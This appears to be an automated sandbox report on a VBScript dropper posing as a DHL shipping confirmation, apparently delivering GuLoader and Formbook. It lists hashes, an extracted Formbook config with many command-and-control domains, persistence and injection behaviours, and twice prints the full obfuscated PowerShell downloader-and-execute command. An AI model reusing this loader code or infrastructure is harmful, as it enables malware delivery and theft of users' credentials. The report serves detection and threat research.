Analysis
-
max time kernel
147s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-03-2024 02:05
Static task
static1
Behavioral task
behavioral1
Sample
DHL-SHIPPING-CONFIRMATION-383837747733.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
DHL-SHIPPING-CONFIRMATION-383837747733.vbs
Resource
win10v2004-20240226-en
General
-
Target
DHL-SHIPPING-CONFIRMATION-383837747733.vbs
-
Size
10KB
-
MD5
83741a566ed8044f4692b4070986ecb9
-
SHA1
921fa0b4bbe043a6a2a9b972bceab1088acda6f5
-
SHA256
aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a
-
SHA512
a4449f4ec76b25d0a8802afb93791c4522b1fcd14401349172d57ca93817a249b6fa8df2119b76ea3f76a9826592e54de17f0012b9d24d3fcc07bce7fa37bbde
-
SSDEEP
192:2M+7O579hFNNFU4wlr4ZRR/038AVVtkfLda+V9+ZMoce5QmDRs4ngSN+:2M+7O57dFU4wlr4r038AVQfL4+SZt13w
Malware Config
Extracted
formbook
4.1
tt15
wholeplant.online
pornimmersive.site
gelcreativecollabs.com
novanewsbrasil.com
prefabhomes2024th.space
stelautosrl.online
wellnessmindfulhealth.com
qhgly.lol
thefutureshub.com
compk5l.info
insurance-offers.com
de-solarroof.today
pn-pasarwajo.com
rachelelice.com
inkninsight.com
innoviewclinical.com
austrofoods.com
mayanlanguagesaccess.co
ablaiserver.com
staffcanteencook200.buzz
reiniimi.com
nnaed.com
deliciusmalta.com
claudiaschneidercoaching.com
bigmanhauling.com
likesband.com
9hu5ewho.shop
perfectedmediagb.com
dozalfm.com
lcloud-com-website-s.us
scpotcar.com
regnacionalpremiums.site
voltenergieconseil.com
blueheartsofsoflo.net
theoasis-villas.com
offer-confirm.com
infocomptevitale.net
spaselah.com
m5845.cc
killianjacobs.autos
shopnestaus.com
aisamodel.com
casinoartimage.com
baribari-ramen.shop
workoutwitch.com
thetechsolutionhub.com
dickinsonnewhope.com
bushiroad-cn.com
self-divorce.com
prideweek.io
maxhealthguardianship.com
stephendempseysummit.com
ahtranquility.online
thesteambox.co
thecreativenoteboard.com
glechiu.xyz
carrierbagcreatures.com
iyadirphotographie.com
roykelley.com
horizonherald.cfd
boundinfear.com
anaeinigo.com
somo44.shop
vaahghartechsolutions.com
dpxj888.com
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Formbook payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1480-44-0x0000000000400000-0x0000000000581000-memory.dmp formbook behavioral1/memory/1480-47-0x0000000000400000-0x0000000000581000-memory.dmp formbook behavioral1/memory/1556-56-0x00000000000D0000-0x00000000000FF000-memory.dmp formbook behavioral1/memory/1556-58-0x00000000000D0000-0x00000000000FF000-memory.dmp formbook -
Adds policy Run key to start application 2 TTPs 1 IoCs
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-330940541-141609230-1670313778-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run colorcpl.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
colorcpl.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\IPAHDLU = "C:\\Program Files (x86)\\windows mail\\wab.exe" colorcpl.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1480 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2544 powershell.exe 1480 wab.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exewab.execolorcpl.exedescription pid process target process PID 2544 set thread context of 1480 2544 powershell.exe wab.exe PID 1480 set thread context of 1216 1480 wab.exe Explorer.EXE PID 1556 set thread context of 1216 1556 colorcpl.exe Explorer.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-330940541-141609230-1670313778-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 colorcpl.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exewab.execolorcpl.exepid process 2608 powershell.exe 2544 powershell.exe 1480 wab.exe 1480 wab.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exewab.execolorcpl.exepid process 2544 powershell.exe 1480 wab.exe 1480 wab.exe 1480 wab.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe 1556 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exewab.execolorcpl.exedescription pid process Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 1480 wab.exe Token: SeDebugPrivilege 1556 colorcpl.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
WScript.exepowershell.exepowershell.exeExplorer.EXEcolorcpl.exedescription pid process target process PID 2320 wrote to memory of 2608 2320 WScript.exe powershell.exe PID 2320 wrote to memory of 2608 2320 WScript.exe powershell.exe PID 2320 wrote to memory of 2608 2320 WScript.exe powershell.exe PID 2608 wrote to memory of 2544 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 2544 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 2544 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 2544 2608 powershell.exe powershell.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 2544 wrote to memory of 1480 2544 powershell.exe wab.exe PID 1216 wrote to memory of 1556 1216 Explorer.EXE colorcpl.exe PID 1216 wrote to memory of 1556 1216 Explorer.EXE colorcpl.exe PID 1216 wrote to memory of 1556 1216 Explorer.EXE colorcpl.exe PID 1216 wrote to memory of 1556 1216 Explorer.EXE colorcpl.exe PID 1556 wrote to memory of 2108 1556 colorcpl.exe Firefox.exe PID 1556 wrote to memory of 2108 1556 colorcpl.exe Firefox.exe PID 1556 wrote to memory of 2108 1556 colorcpl.exe Firefox.exe PID 1556 wrote to memory of 2108 1556 colorcpl.exe Firefox.exe PID 1556 wrote to memory of 2108 1556 colorcpl.exe Firefox.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-SHIPPING-CONFIRMATION-383837747733.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. ';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. ';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ZDLETEHLEQQSX3M6TCZ.tempFilesize
7KB
MD56a98e06e273ab409c8247f63b3043337
SHA1ab0c1bdbffb6646def7a5244d2d4111fcccc7a50
SHA2560d03d22e94b308278d4d3183a5091c3c77749f6012f8c6f85f5c89259400c49b
SHA5129d343a00accbdc96bf6e95621877b2ffd5a2be35345d964e3af4f47c86f6456216ae1d4ac59a5ca39bd125101382d634e74b825001072bdae69411df72d0b810
-
memory/1216-48-0x00000000029A0000-0x0000000002AA0000-memory.dmpFilesize
1024KB
-
memory/1216-52-0x0000000006810000-0x0000000006926000-memory.dmpFilesize
1.1MB
-
memory/1480-40-0x0000000000EF0000-0x0000000002935000-memory.dmpFilesize
26.3MB
-
memory/1480-51-0x0000000000EF0000-0x0000000002935000-memory.dmpFilesize
26.3MB
-
memory/1480-47-0x0000000000400000-0x0000000000581000-memory.dmpFilesize
1.5MB
-
memory/1480-46-0x000000001DF50000-0x000000001E253000-memory.dmpFilesize
3.0MB
-
memory/1480-44-0x0000000000400000-0x0000000000581000-memory.dmpFilesize
1.5MB
-
memory/1480-43-0x0000000077A26000-0x0000000077A27000-memory.dmpFilesize
4KB
-
memory/1480-42-0x00000000779F0000-0x0000000077AC6000-memory.dmpFilesize
856KB
-
memory/1480-41-0x0000000077800000-0x00000000779A9000-memory.dmpFilesize
1.7MB
-
memory/1480-50-0x00000000000F0000-0x0000000000104000-memory.dmpFilesize
80KB
-
memory/1556-53-0x00000000008F0000-0x0000000000908000-memory.dmpFilesize
96KB
-
memory/1556-55-0x00000000008F0000-0x0000000000908000-memory.dmpFilesize
96KB
-
memory/1556-58-0x00000000000D0000-0x00000000000FF000-memory.dmpFilesize
188KB
-
memory/1556-63-0x0000000000840000-0x00000000008D3000-memory.dmpFilesize
588KB
-
memory/1556-68-0x0000000000840000-0x00000000008D3000-memory.dmpFilesize
588KB
-
memory/1556-56-0x00000000000D0000-0x00000000000FF000-memory.dmpFilesize
188KB
-
memory/1556-57-0x0000000001FE0000-0x00000000022E3000-memory.dmpFilesize
3.0MB
-
memory/2544-30-0x0000000005BD0000-0x0000000005BD1000-memory.dmpFilesize
4KB
-
memory/2544-34-0x0000000073840000-0x0000000073DEB000-memory.dmpFilesize
5.7MB
-
memory/2544-37-0x0000000077800000-0x00000000779A9000-memory.dmpFilesize
1.7MB
-
memory/2544-38-0x00000000779F0000-0x0000000077AC6000-memory.dmpFilesize
856KB
-
memory/2544-39-0x0000000006390000-0x0000000007DD5000-memory.dmpFilesize
26.3MB
-
memory/2544-12-0x0000000073840000-0x0000000073DEB000-memory.dmpFilesize
5.7MB
-
memory/2544-28-0x0000000073840000-0x0000000073DEB000-memory.dmpFilesize
5.7MB
-
memory/2544-14-0x0000000073840000-0x0000000073DEB000-memory.dmpFilesize
5.7MB
-
memory/2544-13-0x00000000005A0000-0x00000000005E0000-memory.dmpFilesize
256KB
-
memory/2544-32-0x0000000006390000-0x0000000007DD5000-memory.dmpFilesize
26.3MB
-
memory/2544-45-0x0000000006390000-0x0000000007DD5000-memory.dmpFilesize
26.3MB
-
memory/2544-33-0x00000000005A0000-0x00000000005E0000-memory.dmpFilesize
256KB
-
memory/2544-31-0x0000000006390000-0x0000000007DD5000-memory.dmpFilesize
26.3MB
-
memory/2608-25-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-49-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmpFilesize
9.6MB
-
memory/2608-29-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-27-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-26-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-4-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmpFilesize
9.6MB
-
memory/2608-24-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmpFilesize
9.6MB
-
memory/2608-9-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-8-0x0000000002560000-0x0000000002568000-memory.dmpFilesize
32KB
-
memory/2608-7-0x000000001B260000-0x000000001B542000-memory.dmpFilesize
2.9MB
-
memory/2608-6-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB
-
memory/2608-5-0x0000000002880000-0x0000000002900000-memory.dmpFilesize
512KB